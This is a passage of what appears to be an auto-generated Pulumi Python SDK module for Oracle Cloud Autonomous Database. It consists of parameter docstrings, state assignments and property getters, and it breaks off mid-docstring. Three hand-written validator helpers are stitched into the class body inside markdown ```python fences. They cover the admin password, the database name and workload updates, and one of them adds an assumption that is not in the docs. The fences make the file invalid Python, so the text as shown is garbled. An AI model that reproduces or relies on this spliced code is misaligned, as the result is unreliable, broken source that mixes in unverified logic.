:param pulumi.Input[bool] is_access_control_enabled: (Updatable) Indicates if database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database becomes inaccessible. Rules can be added later using the `UpdateAutonomousDatabase` API operation or the edit option in the console. When creating a database clone, specify the desired access control setting; by default, database-level access control is disabled for the clone.
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
:param pulumi.Input[bool] is_data_guard_enabled: (Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
:param pulumi.Input[bool] is_dedicated: True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
:param pulumi.Input[bool] is_free_tier: (Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX` it cannot be `true`.
:param pulumi.Input[bool] is_preview: Indicates if the Autonomous Database version is a preview version.
:param pulumi.Input[bool] is_preview_version_with_service_terms_accepted: If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
:param pulumi.Input[bool] is_refreshable_clone: (Updatable) True to create a refreshable clone; False to detach the clone from the source Autonomous Database. Detaching is a one-time operation, and the clone becomes a regular Autonomous Database.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseKeyHistoryEntryArgs']]]] key_history_entries: Key History Entry.
:param pulumi.Input[str] key_store_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the key store.
:param pulumi.Input[str] key_store_wallet_name: The wallet name for Oracle Key Vault.
:param pulumi.Input[str] kms_key_id: The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
:param pulumi.Input[str] kms_key_lifecycle_details: KMS key lifecycle details.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring Your Own License (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system supplies the value `BRING_YOUR_OWN_LICENSE`. This field is required when `db_workload` is AJD and must be set to `LICENSE_INCLUDED`, because AJD does not support the default `license_model` value `BRING_YOUR_OWN_LICENSE`.
:param pulumi.Input[str] lifecycle_details: Additional information about the current lifecycle state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
:param pulumi.Input[float] ocpu_count: (Updatable) The number of OCPU cores to be made available to the database.
:param pulumi.Input[str] open_mode: The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
:param pulumi.Input[str] operations_insights_status: Status of Operations Insights for this Autonomous Database.
:param pulumi.Input[str] permission_level: The Autonomous Database permission level. Restricted mode allows access only to admin users.
:param pulumi.Input[str] private_endpoint: The private endpoint for the resource.
:param pulumi.Input[str] private_endpoint_ip: The private endpoint IP address for the resource.
:param pulumi.Input[str] private_endpoint_label: (Updatable) The private endpoint label for the resource.
:param pulumi.Input[str] refreshable_mode: (Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
:param pulumi.Input[str] refreshable_status: The refresh status of the clone. REFRESHING indicates that the clone is currently being refreshed with data from the source Autonomous Database.
:param pulumi.Input[str] role: The Data Guard role of the Autonomous Container Database, if Autonomous Data Guard is enabled.
:param pulumi.Input[bool] rotate_key_trigger: (Updatable) An optional property that, when toggled, triggers rotation of the KMS key. It is applicable only to dedicated databases, i.e. where `is_dedicated` is true.
:param pulumi.Input[str] service_console_url: The URL of the Service Console for the Autonomous Database.
:param pulumi.Input[str] source: The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
:param pulumi.Input[str] source_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[pulumi.InputType['AutonomousDatabaseStandbyDbArgs']] standby_db: Autonomous Data Guard standby database details.
:param pulumi.Input[Sequence[pulumi.Input[str]]] standby_whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
:param pulumi.Input[str] state: (Updatable) The current state of the Autonomous Database. Can be set to AVAILABLE or STOPPED.
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
:param pulumi.Input[str] switchover_to: Applicable only when `is_data_guard_enabled` is true. Can be set to `PRIMARY` or `STANDBY`. The default value is `PRIMARY`.
:param pulumi.Input[Mapping[str, Any]] system_tags: System tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] time_created: The date and time the Autonomous Database was created.
:param pulumi.Input[str] time_deletion_of_free_autonomous_database: The date and time the Always Free database will be automatically deleted because of inactivity. If the database is in the STOPPED state and without activity until this time, it will be deleted.
:param pulumi.Input[str] time_maintenance_begin: The date and time when maintenance will begin.
:param pulumi.Input[str] time_maintenance_end: The date and time when maintenance will end.
:param pulumi.Input[str] time_of_last_failover: The timestamp of the last failover operation.
:param pulumi.Input[str] time_of_last_refresh: The date and time when last refresh happened.
:param pulumi.Input[str] time_of_last_refresh_point: The refresh point timestamp (UTC). The refresh point is the time to which the database was most recently refreshed. Data created after the refresh point is not included in the refresh.
:param pulumi.Input[str] time_of_last_switchover: The timestamp of the last switchover operation for the Autonomous Database.
:param pulumi.Input[str] time_of_next_refresh: The date and time of next refresh.
:param pulumi.Input[str] time_reclamation_of_free_autonomous_database: The date and time the Always Free database will be stopped because of inactivity. If this time is reached without any database activity, the database will automatically be put into the STOPPED state.
:param pulumi.Input[str] timestamp: The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
:param pulumi.Input[int] used_data_storage_size_in_tbs: The amount of storage that has been used, in terabytes.
:param pulumi.Input[str] vault_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AutonomousDatabaseState.__new__(_AutonomousDatabaseState)
__props__.__dict__["admin_password"] = admin_password
__props__.__dict__["apex_details"] = apex_details
__props__.__dict__["are_primary_whitelisted_ips_used"] = are_primary_whitelisted_ips_used
__props__.__dict__["autonomous_container_database_id"] = autonomous_container_database_id
__props__.__dict__["autonomous_database_backup_id"] = autonomous_database_backup_id
__props__.__dict__["autonomous_database_id"] = autonomous_database_id
__props__.__dict__["autonomous_maintenance_schedule_type"] = autonomous_maintenance_schedule_type
__props__.__dict__["available_upgrade_versions"] = available_upgrade_versions
__props__.__dict__["backup_config"] = backup_config
__props__.__dict__["clone_type"] = clone_type
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["connection_strings"] = connection_strings
__props__.__dict__["connection_urls"] = connection_urls
__props__.__dict__["cpu_core_count"] = cpu_core_count
__props__.__dict__["customer_contacts"] = customer_contacts
__props__.__dict__["data_safe_status"] = data_safe_status
__props__.__dict__["data_storage_size_in_gb"] = data_storage_size_in_gb
__props__.__dict__["data_storage_size_in_tbs"] = data_storage_size_in_tbs
__props__.__dict__["db_name"] = db_name
__props__.__dict__["db_version"] = db_version
__props__.__dict__["db_workload"] = db_workload
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["failed_data_recovery_in_seconds"] = failed_data_recovery_in_seconds
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["infrastructure_type"] = infrastructure_type
__props__.__dict__["is_access_control_enabled"] = is_access_control_enabled
__props__.__dict__["is_auto_scaling_enabled"] = is_auto_scaling_enabled
__props__.__dict__["is_data_guard_enabled"] = is_data_guard_enabled
__props__.__dict__["is_dedicated"] = is_dedicated
__props__.__dict__["is_free_tier"] = is_free_tier
__props__.__dict__["is_preview"] = is_preview
__props__.__dict__["is_preview_version_with_service_terms_accepted"] = is_preview_version_with_service_terms_accepted
__props__.__dict__["is_refreshable_clone"] = is_refreshable_clone
__props__.__dict__["key_history_entries"] = key_history_entries
__props__.__dict__["key_store_id"] = key_store_id
__props__.__dict__["key_store_wallet_name"] = key_store_wallet_name
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["kms_key_lifecycle_details"] = kms_key_lifecycle_details
__props__.__dict__["license_model"] = license_model
__props__.__dict__["lifecycle_details"] = lifecycle_details
__props__.__dict__["nsg_ids"] = nsg_ids
__props__.__dict__["ocpu_count"] = ocpu_count
__props__.__dict__["open_mode"] = open_mode
__props__.__dict__["operations_insights_status"] = operations_insights_status
__props__.__dict__["permission_level"] = permission_level
__props__.__dict__["private_endpoint"] = private_endpoint
__props__.__dict__["private_endpoint_ip"] = private_endpoint_ip
__props__.__dict__["private_endpoint_label"] = private_endpoint_label
__props__.__dict__["refreshable_mode"] = refreshable_mode
__props__.__dict__["refreshable_status"] = refreshable_status
__props__.__dict__["role"] = role
__props__.__dict__["rotate_key_trigger"] = rotate_key_trigger
__props__.__dict__["service_console_url"] = service_console_url
__props__.__dict__["source"] = source
__props__.__dict__["source_id"] = source_id
__props__.__dict__["standby_db"] = standby_db
__props__.__dict__["standby_whitelisted_ips"] = standby_whitelisted_ips
__props__.__dict__["state"] = state
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["switchover_to"] = switchover_to
__props__.__dict__["system_tags"] = system_tags
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_deletion_of_free_autonomous_database"] = time_deletion_of_free_autonomous_database
__props__.__dict__["time_maintenance_begin"] = time_maintenance_begin
__props__.__dict__["time_maintenance_end"] = time_maintenance_end
__props__.__dict__["time_of_last_failover"] = time_of_last_failover
__props__.__dict__["time_of_last_refresh"] = time_of_last_refresh
__props__.__dict__["time_of_last_refresh_point"] = time_of_last_refresh_point
__props__.__dict__["time_of_last_switchover"] = time_of_last_switchover
__props__.__dict__["time_of_next_refresh"] = time_of_next_refresh
__props__.__dict__["time_reclamation_of_free_autonomous_database"] = time_reclamation_of_free_autonomous_database
__props__.__dict__["timestamp"] = timestamp
__props__.__dict__["used_data_storage_size_in_tbs"] = used_data_storage_size_in_tbs
__props__.__dict__["vault_id"] = vault_id
__props__.__dict__["whitelisted_ips"] = whitelisted_ips
return AutonomousDatabase(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="adminPassword")
def admin_password(self) -> pulumi.Output[str]:
"""
(Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
"""
return pulumi.get(self, "admin_password")
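# The password rules in the docstring above can be checked locally before
# provisioning. This is a hedged sketch: `is_valid_admin_password` is a
# hypothetical helper, not part of this SDK.

```python
import re

def is_valid_admin_password(password: str) -> bool:
    """Check the documented admin password rules locally (hypothetical helper)."""
    if not 12 <= len(password) <= 30:
        return False
    # No double quote, and no "admin" regardless of casing.
    if '"' in password or "admin" in password.lower():
        return False
    # At least one uppercase, one lowercase, and one numeric character.
    return bool(re.search(r"[A-Z]", password)
                and re.search(r"[a-z]", password)
                and re.search(r"[0-9]", password))
```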
@property
@pulumi.getter(name="apexDetails")
def apex_details(self) -> pulumi.Output['outputs.AutonomousDatabaseApexDetails']:
"""
Information about Oracle APEX Application Development.
"""
return pulumi.get(self, "apex_details")
@property
@pulumi.getter(name="arePrimaryWhitelistedIpsUsed")
def are_primary_whitelisted_ips_used(self) -> pulumi.Output[bool]:
"""
(Updatable) This field is null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. Its value is `TRUE` if the Autonomous Database is Data Guard enabled, Access Control is enabled, and the Autonomous Database uses the primary's IP access control list (ACL) for the standby. Its value is `FALSE` if the Autonomous Database is Data Guard enabled, Access Control is enabled, and the standby uses a different IP access control list (ACL) than the primary.
"""
return pulumi.get(self, "are_primary_whitelisted_ips_used")
@property
@pulumi.getter(name="autonomousContainerDatabaseId")
def autonomous_container_database_id(self) -> pulumi.Output[str]:
"""
The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
"""
return pulumi.get(self, "autonomous_container_database_id")
@property
@pulumi.getter(name="autonomousDatabaseBackupId")
def autonomous_database_backup_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "autonomous_database_backup_id")
@property
@pulumi.getter(name="autonomousDatabaseId")
def autonomous_database_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "autonomous_database_id")
@property
@pulumi.getter(name="autonomousMaintenanceScheduleType")
def autonomous_maintenance_schedule_type(self) -> pulumi.Output[str]:
"""
The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule of this Autonomous Database follows a schedule that applies patches prior to the REGULAR schedule. The REGULAR maintenance schedule of this Autonomous Database follows the normal cycle.
"""
return pulumi.get(self, "autonomous_maintenance_schedule_type")
@property
@pulumi.getter(name="availableUpgradeVersions")
def available_upgrade_versions(self) -> pulumi.Output[Sequence[str]]:
"""
List of Oracle Database versions available for a database upgrade. If there are no version upgrades available, this list is empty.
"""
return pulumi.get(self, "available_upgrade_versions")
@property
@pulumi.getter(name="backupConfig")
def backup_config(self) -> pulumi.Output['outputs.AutonomousDatabaseBackupConfig']:
"""
Autonomous Database configuration details for storing [manual backups](https://docs.cloud.oracle.com/iaas/Content/Database/Tasks/adbbackingup.htm) in the [Object Storage](https://docs.cloud.oracle.com/iaas/Content/Object/Concepts/objectstorageoverview.htm) service.
"""
return pulumi.get(self, "backup_config")
@property
@pulumi.getter(name="cloneType")
def clone_type(self) -> pulumi.Output[str]:
"""
The Autonomous Database clone type.
"""
return pulumi.get(self, "clone_type")
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="connectionStrings")
def connection_strings(self) -> pulumi.Output['outputs.AutonomousDatabaseConnectionStrings']:
"""
The connection string used to connect to the Autonomous Database. The username for the Service Console is ADMIN. Use the password you entered when creating the Autonomous Database for the password value.
"""
return pulumi.get(self, "connection_strings")
@property
@pulumi.getter(name="connectionUrls")
def connection_urls(self) -> pulumi.Output['outputs.AutonomousDatabaseConnectionUrls']:
"""
The URLs for accessing Oracle Application Express (APEX) and SQL Developer Web with a browser from a Compute instance within your VCN or that has a direct connection to your VCN. Note that these URLs are provided by the console only for databases on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm). Example: `{"sqlDevWebUrl": "https://<hostname>/ords...", "apexUrl": "https://<hostname>/ords..."}`
"""
return pulumi.get(self, "connection_urls")
@property
@pulumi.getter(name="cpuCoreCount")
def cpu_core_count(self) -> pulumi.Output[int]:
"""
(Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "cpu_core_count")
@property
@pulumi.getter(name="customerContacts")
def customer_contacts(self) -> pulumi.Output[Sequence['outputs.AutonomousDatabaseCustomerContact']]:
"""
(Updatable) Customer Contacts.
"""
return pulumi.get(self, "customer_contacts")
@property
@pulumi.getter(name="dataSafeStatus")
def data_safe_status(self) -> pulumi.Output[str]:
"""
(Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
"""
return pulumi.get(self, "data_safe_status")
@property
@pulumi.getter(name="dataStorageSizeInGb")
def data_storage_size_in_gb(self) -> pulumi.Output[int]:
"""
(Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "data_storage_size_in_gb")
@property
@pulumi.getter(name="dataStorageSizeInTbs")
def data_storage_size_in_tbs(self) -> pulumi.Output[int]:
"""
(Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "data_storage_size_in_tbs")
@property
@pulumi.getter(name="dbName")
def db_name(self) -> pulumi.Output[str]:
"""
The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
"""
return pulumi.get(self, "db_name")
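# The db_name shape described above (leading alphabetic character, at most 14
# alphanumeric characters in total, no specials) can be expressed as a quick
# local check. `is_valid_db_name` is a hypothetical helper, not an SDK
# function, and tenancy-wide uniqueness can only be verified server-side.

```python
import re

# Assumes the 14-character maximum includes the leading alphabetic character.
_DB_NAME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9]{0,13}$")

def is_valid_db_name(name: str) -> bool:
    """Validate the documented db_name shape locally (hypothetical helper)."""
    return bool(_DB_NAME_RE.match(name))
```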
@property
@pulumi.getter(name="dbVersion")
def db_version(self) -> pulumi.Output[str]:
"""
(Updatable) A valid Oracle Database version for Autonomous Database. Note that the `db_workload` values AJD and APEX are only supported for `db_version` `19c` and above.
"""
return pulumi.get(self, "db_version")
@property
@pulumi.getter(name="dbWorkload")
def db_workload(self) -> pulumi.Output[str]:
"""
(Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. Note: `db_workload` can only be updated from AJD to OLTP, or from a free-tier OLTP to AJD.
"""
return pulumi.get(self, "db_workload")
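# The update restriction noted above (AJD -> OLTP, or free-tier OLTP -> AJD)
# can be sketched as a small predicate. The helper name and the treatment of
# no-op updates are illustrative assumptions, not SDK behavior.

```python
def is_allowed_workload_update(current: str, new: str, is_free_tier: bool = False) -> bool:
    """Allow only AJD -> OLTP, or free-tier OLTP -> AJD, per the documented rule."""
    if current == "AJD" and new == "OLTP":
        return True
    if current == "OLTP" and new == "AJD" and is_free_tier:
        return True
    # Assumption: leaving the workload unchanged is trivially permitted.
    return current == new
```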
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
(Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="failedDataRecoveryInSeconds")
def failed_data_recovery_in_seconds(self) -> pulumi.Output[int]:
"""
Indicates the number of seconds of data loss for a Data Guard failover.
"""
return pulumi.get(self, "failed_data_recovery_in_seconds")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="infrastructureType")
def infrastructure_type(self) -> pulumi.Output[str]:
"""
The infrastructure type this resource belongs to.
"""
return pulumi.get(self, "infrastructure_type")
@property
@pulumi.getter(name="isAccessControlEnabled")
def is_access_control_enabled(self) -> pulumi.Output[bool]:
"""
(Updatable) Indicates if database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or the edit option in the console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control is disabled for the clone.
"""
return pulumi.get(self, "is_access_control_enabled")
@property
@pulumi.getter(name="isAutoScalingEnabled")
def is_auto_scaling_enabled(self) -> pulumi.Output[bool]:
"""
(Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
"""
return pulumi.get(self, "is_auto_scaling_enabled")
@property
@pulumi.getter(name="isDataGuardEnabled")
def is_data_guard_enabled(self) -> pulumi.Output[bool]:
"""
(Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
"""
return pulumi.get(self, "is_data_guard_enabled")
@property
@pulumi.getter(name="isDedicated")
def is_dedicated(self) -> pulumi.Output[bool]:
"""
True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
"""
return pulumi.get(self, "is_dedicated")
@property
@pulumi.getter(name="isFreeTier")
def is_free_tier(self) -> pulumi.Output[bool]:
"""
(Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX` it cannot be `true`.
"""
return pulumi.get(self, "is_free_tier")
@property
@pulumi.getter(name="isPreview")
def is_preview(self) -> pulumi.Output[bool]:
"""
Indicates if the Autonomous Database version is a preview version.
"""
return pulumi.get(self, "is_preview")
@property
@pulumi.getter(name="isPreviewVersionWithServiceTermsAccepted")
def is_preview_version_with_service_terms_accepted(self) -> pulumi.Output[bool]:
"""
If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
"""
return pulumi.get(self, "is_preview_version_with_service_terms_accepted")
@property
@pulumi.getter(name="isRefreshableClone")
def is_refreshable_clone(self) -> pulumi.Output[bool]:
"""
(Updatable) True to create a refreshable clone; False to detach the clone from its source Autonomous Database. Detaching is a one-time operation, and the clone then becomes a regular Autonomous Database.
"""
return pulumi.get(self, "is_refreshable_clone")
@property
@pulumi.getter(name="keyHistoryEntries")
def key_history_entries(self) -> pulumi.Output[Sequence['outputs.AutonomousDatabaseKeyHistoryEntry']]:
"""
Key History Entry.
"""
return pulumi.get(self, "key_history_entries")
@property
@pulumi.getter(name="keyStoreId")
def key_store_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the key store.
"""
return pulumi.get(self, "key_store_id")
@property
@pulumi.getter(name="keyStoreWalletName")
def key_store_wallet_name(self) -> pulumi.Output[str]:
"""
The wallet name for Oracle Key Vault.
"""
return pulumi.get(self, "key_store_wallet_name")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> pulumi.Output[str]:
"""
The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter(name="kmsKeyLifecycleDetails")
def kms_key_lifecycle_details(self) -> pulumi.Output[str]:
"""
KMS key lifecycle details.
"""
return pulumi.get(self, "kms_key_lifecycle_details")
@property
@pulumi.getter(name="licenseModel")
def license_model(self) -> pulumi.Output[str]:
"""
(Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will supply the value of `BRING_YOUR_OWN_LICENSE`. It is a required field when `db_workload` is AJD and needs to be set to `LICENSE_INCLUDED` as AJD does not support default `license_model` value `BRING_YOUR_OWN_LICENSE`.
"""
return pulumi.get(self, "license_model")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
"""
Additional information about the current lifecycle state.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter(name="nsgIds")
def nsg_ids(self) -> pulumi.Output[Sequence[str]]:
"""
(Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
"""
return pulumi.get(self, "nsg_ids")
@property
@pulumi.getter(name="ocpuCount")
def ocpu_count(self) -> pulumi.Output[float]:
"""
(Updatable) The number of OCPU cores to be made available to the database.
"""
return pulumi.get(self, "ocpu_count")
@property
@pulumi.getter(name="openMode")
def open_mode(self) -> pulumi.Output[str]:
"""
The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
"""
return pulumi.get(self, "open_mode")
@property
@pulumi.getter(name="operationsInsightsStatus")
def operations_insights_status(self) -> pulumi.Output[str]:
"""
Status of Operations Insights for this Autonomous Database.
"""
return pulumi.get(self, "operations_insights_status")
@property
@pulumi.getter(name="permissionLevel")
def permission_level(self) -> pulumi.Output[str]:
"""
The Autonomous Database permission level. Restricted mode allows access only to admin users.
"""
return pulumi.get(self, "permission_level")
@property
@pulumi.getter(name="privateEndpoint")
def private_endpoint(self) -> pulumi.Output[str]:
"""
The private endpoint for the resource.
"""
return pulumi.get(self, "private_endpoint")
@property
@pulumi.getter(name="privateEndpointIp")
def private_endpoint_ip(self) -> pulumi.Output[str]:
"""
The private endpoint IP address for the resource.
"""
return pulumi.get(self, "private_endpoint_ip")
@property
@pulumi.getter(name="privateEndpointLabel")
def private_endpoint_label(self) -> pulumi.Output[str]:
"""
(Updatable) The private endpoint label for the resource.
"""
return pulumi.get(self, "private_endpoint_label")
@property
@pulumi.getter(name="refreshableMode")
def refreshable_mode(self) -> pulumi.Output[str]:
"""
(Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
"""
return pulumi.get(self, "refreshable_mode")
@property
@pulumi.getter(name="refreshableStatus")
def refreshable_status(self) -> pulumi.Output[str]:
"""
The refresh status of the clone. REFRESHING indicates that the clone is currently being refreshed with data from the source Autonomous Database.
"""
return pulumi.get(self, "refreshable_status")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
